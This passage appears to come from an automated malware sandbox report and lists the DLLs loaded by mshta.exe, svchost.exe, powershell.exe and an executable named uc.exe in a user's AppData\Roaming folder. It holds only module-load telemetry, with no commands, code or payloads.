Source: C:\Windows\System32\mshta.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wininet.dll
Source: C:\Windows\System32\mshta.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: profapi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\mshta.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\mshta.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: ieframe.dll
Source: C:\Windows\System32\mshta.exe Section loaded: netapi32.dll
Source: C:\Windows\System32\mshta.exe Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe Section loaded: userenv.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exe Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dcomp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\mshta.exe Section loaded: schannel.dll
Source: C:\Windows\System32\mshta.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\mshta.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\mshta.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\mshta.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\mshta.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: textshaping.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msls31.dll
Source: C:\Windows\System32\mshta.exe Section loaded: d2d1.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dwrite.dll
Source: C:\Windows\System32\mshta.exe Section loaded: d3d10warp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dxcore.dll
Source: C:\Windows\System32\mshta.exe Section loaded: mlang.dll
Source: C:\Windows\System32\mshta.exe Section loaded: jscript9.dll
Source: C:\Windows\System32\mshta.exe Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exe Section loaded: sxs.dll
Source: C:\Windows\System32\mshta.exe Section loaded: propsys.dll
Source: C:\Windows\System32\mshta.exe Section loaded: edputil.dll
Source: C:\Windows\System32\mshta.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\mshta.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\mshta.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\mshta.exe Section loaded: slc.dll
Source: C:\Windows\System32\mshta.exe Section loaded: sppc.dll
Source: C:\Windows\System32\mshta.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\mshta.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: url.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: endpointdlp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: eamsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: smartscreenps.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
